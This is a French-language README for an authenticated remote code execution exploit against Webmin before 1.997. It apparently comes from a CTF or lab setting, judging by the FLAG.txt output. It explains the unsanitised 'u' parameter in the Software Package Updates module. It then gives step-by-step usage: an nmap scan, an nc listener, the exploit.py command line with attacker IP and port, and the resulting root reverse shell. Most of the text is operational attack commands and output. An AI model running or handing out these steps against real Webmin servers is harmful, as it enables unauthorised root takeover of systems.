
Exploit d'exécution de code à distance authentifié pour Webmin < 1.997 via le module Software Package Updates. Injecte des commandes arbitraires en tant que root à travers un paramètre non assaini, fournissant un shell inversé.
Exploit pour la vulnérabilité d'exécution de code à distance dans Webmin versions antérieures à 1.997, via le module Software Package Updates.
Le module Software Package Updates de Webmin ne nettoie pas correctement le
paramètre u avant de le passer au système. Un utilisateur authentifié avec un accès
à ce module peut injecter des commandes arbitraires qui s'exécutent en tant que root.
Installe les dépendances avant d'exécuter l'exploit :
pip3 install requests beautifulsoup4 lxml urllib3
| Paramètre | Description | Exemple |
|---|
-t | URL de la cible (sans port) | https://192.168.1.10 |
-u | Utilisateur Webmin | admin |
-p | Mot de passe Webmin | password123 |
-l | Ton IP (où tu reçois le shell) | 192.168.1.5 |
-lp | Port d'écoute | 4444 |
1 — Identifie l'IP de la cible avec Nmap :
nmap -sV TARGET_IP
# Cherche le port 10000 avec Webmin
2 — Ouvre le listener sur ta machine :
nc -lvnp 4444
3 — Dans un autre terminal, exécute l'exploit :
python3 exploit.py \
-t https://TARGET_IP \
-u admin \
-p PASSWORD \
-l TON_IP \
-lp 4444
4 — Si l'exploit réussit, tu verras :
5 — Sur le listener, tu recevras un shell en tant que root :
# whoami
root
# cat /root/Desktop/FLAG.txt
FLAG{...}
# Terminal 1
nc -lvnp 4444
# Terminal 2
python3 exploit.py -t https://192.168.253.156 -u admin -p 'W3bm1n2024' -l 192.168.253.130 -lp 4444